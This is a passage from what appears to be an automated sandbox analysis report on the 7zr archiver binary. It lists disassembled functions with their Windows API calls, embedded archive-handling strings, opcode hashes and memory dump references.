                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: CloseHandle
                            • String ID:
                            • API String ID: 2962429428-0
                            • Opcode ID: 25ffa7b274dd0bed99923ed818d2a17c9784964afb5f3bd2827dc48ba03d08e3
                            • Instruction ID: a0e942f9eb14463f816ddc3886e1abc5dbcb2bc14b7650e5149e88ba1a5af35c
                            • Opcode Fuzzy Hash: 25ffa7b274dd0bed99923ed818d2a17c9784964afb5f3bd2827dc48ba03d08e3
                            • Instruction Fuzzy Hash: 88D0123155535147DB705E2DFC047D173DD6F11325F15445AF890CB240E764CDC25A64
                            Function 00D26BC6 Relevance: 1.3, APIs: 1, Instructions: 16COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: malloc
                            • String ID:
                            • API String ID: 2803490479-0
                            • Opcode ID: f6689b844a0abd90852679766297054ea5ad023363036feb97c819a96c7c6895
                            • Instruction ID: 52bbc4edcd592bb6b28065f41789f3167c9303a7098e2dc5aaf6c50e36711fb3
                            • Opcode Fuzzy Hash: f6689b844a0abd90852679766297054ea5ad023363036feb97c819a96c7c6895
                            • Instruction Fuzzy Hash: 3FD0C9B16127150ADF484A34684AA6A21946B6131EF2C85B8A812CA291FB19C619D278
                            Function 00CA764C Relevance: 1.3, APIs: 1, Instructions: 16COMMON
                            Download Yara Rule
                            APIs
                            • CloseHandle.KERNELBASE(00000000,?,00CA75AF,00000002,?,00000000,00000000), ref: 00CA7657
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: CloseHandle
                            • String ID:
                            • API String ID: 2962429428-0
                            • Opcode ID: 019d84e26670be529d56018c4598cda5ead6a9070237d66043e9c88457e117d8
                            • Instruction ID: 4809b7244b0d37bc445ae01ec14e8fee3ea7b405d86290749de25b3a7d8ab68d
                            • Opcode Fuzzy Hash: 019d84e26670be529d56018c4598cda5ead6a9070237d66043e9c88457e117d8
                            • Instruction Fuzzy Hash: 4ED01231119723878A681E3C7C45AC233D86A133383651759F0B0C32E1D3608C834650
                            Function 00D26B23 Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON
                            Download Yara Rule
                            APIs
                            • VirtualAlloc.KERNELBASE(00000000), ref: 00D26B31
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: db51801202afa3e4a05f7fca4d48db54c3fedad4b816b1aa80fbe15e29df3aa9
                            • Instruction ID: f35d7f7de392ac92864236dbf76df0c4a71eda44e58b4d8bb01e93fb16998605
                            • Opcode Fuzzy Hash: db51801202afa3e4a05f7fca4d48db54c3fedad4b816b1aa80fbe15e29df3aa9
                            • Instruction Fuzzy Hash: 1CC08CE1A4E290DFDF0257108C407603B208B83300F0A10C1E4049B092C2041808C722
                            Function 00D269D0 Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: malloc
                            • String ID:
                            • API String ID: 2803490479-0
                            • Opcode ID: a1e9458a9ade6dcfe768eb88d97769c87549e2230f9edfc2c16aad58367e7da2
                            • Instruction ID: 4419fc0cbd5de19d5557afe6aa1e08a5670cb7cbbe4cb29fd7c58d050be61204
                            • Opcode Fuzzy Hash: a1e9458a9ade6dcfe768eb88d97769c87549e2230f9edfc2c16aad58367e7da2
                            • Instruction Fuzzy Hash: C4A012D691125001DD1C223038054171000126020BBC404B87401C0111FA17C1045035
                            Function 00D26AF0 Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: malloc
                            • String ID:
                            • API String ID: 2803490479-0
                            • Opcode ID: 3fa4672c4b6bd134d2e796e347ec7e9f7655e2c8d42b0b7908dcec06aed2b463
                            • Instruction ID: 3b82555b397d5bca9337f696017ddf9fb92774366a95737186572c1ab61a0f68
                            • Opcode Fuzzy Hash: 3fa4672c4b6bd134d2e796e347ec7e9f7655e2c8d42b0b7908dcec06aed2b463
                            • Instruction Fuzzy Hash: 88A012CDE00300019D0411343805413101262F0609BD8C474640040115FA15C0042032
                            Function 00D26BA3 Relevance: 1.3, APIs: 1, Instructions: 6COMMON
                            Download Yara Rule
                            APIs
                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00D26BAC
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: FreeVirtual
                            • String ID:
                            • API String ID: 1263568516-0
                            • Opcode ID: 6639d40a1132a18af455f82108b90161a987ac1b8e9675a49fcf19c0ebb58a42
                            • Instruction ID: a567d441d2526a914bfcf4d41ac57ef9101975c20ab62223573eea5f5b046a46
                            • Opcode Fuzzy Hash: 6639d40a1132a18af455f82108b90161a987ac1b8e9675a49fcf19c0ebb58a42
                            • Instruction Fuzzy Hash: A5A0027C691700B7EDA0AF306D4FF5937247781F05F3095447241A91D05AE470449A6C
                            Function 00D269F0 Relevance: 1.3, APIs: 1, Instructions: 4COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: free
                            • String ID:
                            • API String ID: 1294909896-0
                            • Opcode ID: e2454b01198a5d00fc32ca08fa7a2be7c10d94ad4e9c325630ada15b60d1c1ce
                            • Instruction ID: bcdf9fabcdcbcf8a917bdd455a647e22a58e77fe283fff274352241b848ee8b1
                            • Opcode Fuzzy Hash: e2454b01198a5d00fc32ca08fa7a2be7c10d94ad4e9c325630ada15b60d1c1ce
                            • Instruction Fuzzy Hash:
                            Function 00D26B10 Relevance: 1.3, APIs: 1, Instructions: 4COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: free
                            • String ID:
                            • API String ID: 1294909896-0
                            • Opcode ID: ab05dfddccdf54668762160c2768d01c6ed1f72808f71746a1287bea05698b8a
                            • Instruction ID: 8cd292367b2c7a41a89c470d6e576558ef46ed1f041c672a630c5337fb6bc319
                            • Opcode Fuzzy Hash: ab05dfddccdf54668762160c2768d01c6ed1f72808f71746a1287bea05698b8a
                            • Instruction Fuzzy Hash:
                            Function 00CA1E40 Relevance: 1.3, APIs: 1, Instructions: 4COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: free
                            • String ID:
                            • API String ID: 1294909896-0
                            • Opcode ID: 3a72563838246c4284439afff1900ae679e15308b2f8b0b09ca0874dd325d40b
                            • Instruction ID: 97f672430d31ec2690b97390e62d8a07321eabbb9d0894d14f8dd0605f58ece2
                            • Opcode Fuzzy Hash: 3a72563838246c4284439afff1900ae679e15308b2f8b0b09ca0874dd325d40b
                            • Instruction Fuzzy Hash: BEA00275516301DBDA451F10ED094897B61EB86627B215459F057905718B314860BA11

                            Non-executed Functions

                            Function 00D40090 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: Version
                            • String ID:
                            • API String ID: 1889659487-0
                            • Opcode ID: 4d9466896243906d961003fb2fff0e4ec5c074afed37b52fdfbb70ef84ebdba3
                            • Instruction ID: 80927f70fbbc270e71b7f75b5acfcec86e9000320a1200feac3242a47003ec02
                            • Opcode Fuzzy Hash: 4d9466896243906d961003fb2fff0e4ec5c074afed37b52fdfbb70ef84ebdba3
                            • Instruction Fuzzy Hash: 81D05B7292540547D7047B2CC80A3597FA1F7A1300FCC4954DA65C1157F97DC655C6F2
                            Function 00CAC085 Relevance: 21.5, APIs: 17, Instructions: 290COMMON
                            Download Yara Rule
                            APIs
                            • memcmp.MSVCRT(?,00D548A0,00000010), ref: 00CAC09E
                            • memcmp.MSVCRT(?,00D50258,00000010), ref: 00CAC0BB
                            • memcmp.MSVCRT(?,00D50348,00000010), ref: 00CAC0CE
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: memcmp
                            • String ID:
                            • API String ID: 1475443563-0
                            • Opcode ID: 429f7b25477e238b9e06181a80a853ac44f7e70cb188a8b625e2e0e11186752e
                            • Instruction ID: 5b79a3104b1cc8acec50d1b427901981540985918549ec05c4f5e594b315d773
                            • Opcode Fuzzy Hash: 429f7b25477e238b9e06181a80a853ac44f7e70cb188a8b625e2e0e11186752e
                            • Instruction Fuzzy Hash: 8B918271641716AFDB609B22CC85FEB77A8EF66755F008128FD5AD7201F720AE08C7A0
                            Function 00D0447A Relevance: 19.5, APIs: 1, Strings: 10, Instructions: 291COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: $16-bit overflow for number of files in headers$32-bit overflow in headers$Central$Local$Minor_Extra_ERROR$Missing volume : $Unsorted_CD$Zip64$apk
                            • API String ID: 3519838083-1909666238
                            • Opcode ID: 079a3616d0761ef53986aeb9f450bf214811906f410e677be51e5c69115424cd
                            • Instruction ID: c205f38b059f2f59f060d8eef8d8fe32609665e5a66b8ce37e69eec61689d78f
                            • Opcode Fuzzy Hash: 079a3616d0761ef53986aeb9f450bf214811906f410e677be51e5c69115424cd
                            • Instruction Fuzzy Hash: B5C1BFB19002869FCB14DB64C855FFD7BB1EF02300F5D84A9E68D6B1A2D7319E49DB60
                            Function 00CA64F3 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 116threadCOMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CA64F8
                            • GetCurrentThreadId.KERNEL32 ref: 00CA6508
                            • GetTickCount.KERNEL32 ref: 00CA6513
                            • GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 00CA651E
                            • GetTickCount.KERNEL32 ref: 00CA6578
                            • SetLastError.KERNEL32(000000B7,?,?,?,?,00000000), ref: 00CA65C5
                            • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00CA65EC
                              • Part of subcall function 00CA5D7A: __EH_prolog.LIBCMT ref: 00CA5D7F
                              • Part of subcall function 00CA5D7A: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000001,?,?,00000000), ref: 00CA5DA1
                              • Part of subcall function 00CA1E40: free.MSVCRT ref: 00CA1E44
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: CountCurrentErrorH_prologLastTick$CreateDirectoryProcessThreadfree
                            • String ID: .tmp$d
                            • API String ID: 1989517917-2797371523
                            • Opcode ID: 1b153b629128a18cf60770214aff5e6409fd082628ba1f709100d1fd2c904f78
                            • Instruction ID: 0247a819a072b64f829415689c0e987e27951448129668b61fdc9d7d8d632a8e
                            • Opcode Fuzzy Hash: 1b153b629128a18cf60770214aff5e6409fd082628ba1f709100d1fd2c904f78
                            • Instruction Fuzzy Hash: EA41E232D112269BDF15AFA4D8597ED77B1FF1731CF184129F812A72A1CB398900EB61
                            Function 00CD85C6 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 37COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: fputs
                            • String ID: : Cannot open the file as [$ERROR$Open $WARNING$] archive
                            • API String ID: 1795875747-657955069
                            • Opcode ID: 439e8062b5d86dd4bca3cc074e180e4de8268b424f78ecbcfd7e5c48bfc2a3ce
                            • Instruction ID: c0116400d0b5579223a3067e7b6a2678cf2431bd82be3d7f0057b715c409a521
                            • Opcode Fuzzy Hash: 439e8062b5d86dd4bca3cc074e180e4de8268b424f78ecbcfd7e5c48bfc2a3ce
                            • Instruction Fuzzy Hash: 2CF0A7316042197FCB1027956C81D2FFF59DF86365B240027FE0483361EF6118689EB5
                            Function 00CD6244 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 71COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: H_prologfputs
                            • String ID: Cannot open the file$The archive is open with offset$The file is open$WARNING:
                            • API String ID: 1798449854-1259944392
                            • Opcode ID: 3cf866411f458487084f16395a12fd2a2d063ac3ce2a9213e80178bc71675852
                            • Instruction ID: 2c8de44042a3c5185bbc870f86bee5a0ae8816a377fe3fa45df285763c78de88
                            • Opcode Fuzzy Hash: 3cf866411f458487084f16395a12fd2a2d063ac3ce2a9213e80178bc71675852
                            • Instruction Fuzzy Hash: 7E219231A005059FCB04EFA9C852AAEB3B5FF55314F01003AFA02D77A2CB70AD06DB90
                            Function 00CAA08C Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 143COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CAA091
                              • Part of subcall function 00CA9BAA: RegCloseKey.ADVAPI32(?,?,00CA9BA0), ref: 00CA9BB6
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: CloseH_prolog
                            • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$Previous Update Revision$Update Revision$x86
                            • API String ID: 1579395594-270022386
                            • Opcode ID: cc8b391485a8535077bd70f836bafbdefa1feaa1bc745c6832e1507b376a8f14
                            • Instruction ID: ee807f97ab55a239891f42b90a4257651803a31c4d59768fff3c0a2a785ab435
                            • Opcode Fuzzy Hash: cc8b391485a8535077bd70f836bafbdefa1feaa1bc745c6832e1507b376a8f14
                            • Instruction Fuzzy Hash: 26519771E0120AEFCF10DF98C8929AEB7B5FF5A704F40842DE512A7291D7709E05CB61
                            Function 00CD46CF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59timeCOMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CD46D4
                            • EnterCriticalSection.KERNEL32(00D62918), ref: 00CD46E8
                            • CompareFileTime.KERNEL32(?,?), ref: 00CD4712
                            • LeaveCriticalSection.KERNEL32(00D62918), ref: 00CD476A
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: CriticalSection$CompareEnterFileH_prologLeaveTime
                            • String ID: v
                            • API String ID: 3800395459-3261393531
                            • Opcode ID: 96cf9fa4f8369d401edbc472a2185c946f60709cdea82e9081299bab8f683cc0
                            • Instruction ID: d746aaad2b8c91c3e9165f93b51dc5a09be7c90d84a051b46ae2aa7c7616dfb7
                            • Opcode Fuzzy Hash: 96cf9fa4f8369d401edbc472a2185c946f60709cdea82e9081299bab8f683cc0
                            • Instruction Fuzzy Hash: 2221AC71500705EFDB28CF24C488B9ABBB5FF46344F11841AE66A87711D730EA48CBA0
                            Function 00D003D6 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 212COMMON
                            Download Yara Rule
                            APIs
                            • memset.MSVCRT ref: 00D003F5
                            • memcpy.MSVCRT(?,?,00000008,00000064,?,?,?,?,00000064), ref: 00D00490
                            • memset.MSVCRT ref: 00D00618
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: memset$memcpy
                            • String ID: $@
                            • API String ID: 368790112-1077428164
                            • Opcode ID: b087934bbc7c95f7ee7647cfdf8c5fba5a54d9d4edf4d7707c4dc34027eb37c2
                            • Instruction ID: a2f7a7fc4219493ec0287ca80983a54486172864a5a213d628575e369d1fdfdc
                            • Opcode Fuzzy Hash: b087934bbc7c95f7ee7647cfdf8c5fba5a54d9d4edf4d7707c4dc34027eb37c2
                            • Instruction Fuzzy Hash: 18919E30900709BFEB20DF24C845BDABBB2EF54314F048569E59E561D2DB71BA99CFA0
                            Function 00CA613C Relevance: 7.6, APIs: 5, Instructions: 150COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00CA6141
                              • Part of subcall function 00CA6C72: __EH_prolog.LIBCMT ref: 00CA6C77
                            • SetLastError.KERNEL32(0000010B,00000000,00000000), ref: 00CA6197
                            • GetLastError.KERNEL32(?,?,?,0000005C,?,00000000,00000000), ref: 00CA626E
                            • SetLastError.KERNEL32(?,?,?,?,?,0000005C,?,00000000,00000000), ref: 00CA62A9
                              • Part of subcall function 00CA6096: __EH_prolog.LIBCMT ref: 00CA609B
                              • Part of subcall function 00CA6096: DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00CA60DF
                            • GetLastError.KERNEL32(?,?,?,0000005C,?,00000000,00000000), ref: 00CA6285
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1795149048.0000000000CA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CA0000, based on PE: true
                            • Associated: 0000000A.00000002.1795130448.0000000000CA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795219850.0000000000D4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795247299.0000000000D62000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1795268226.0000000000D6B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ca0000_7zr.jbxd
                            Similarity
                            • API ID: ErrorLast$H_prolog$DeleteFile
                            • String ID:
                            • API String ID: 3586524497-0
                            • Opcode ID: 812e42cd47a4f323bb90c2496fd6b8553b8ab3759fc7f4d00d41505b5efab4d8
                            • Instruction ID: 01e70cc0e0a2e2bd021a4d14d8ad5d004f4a380451c038a716a5c4196c03e1d4
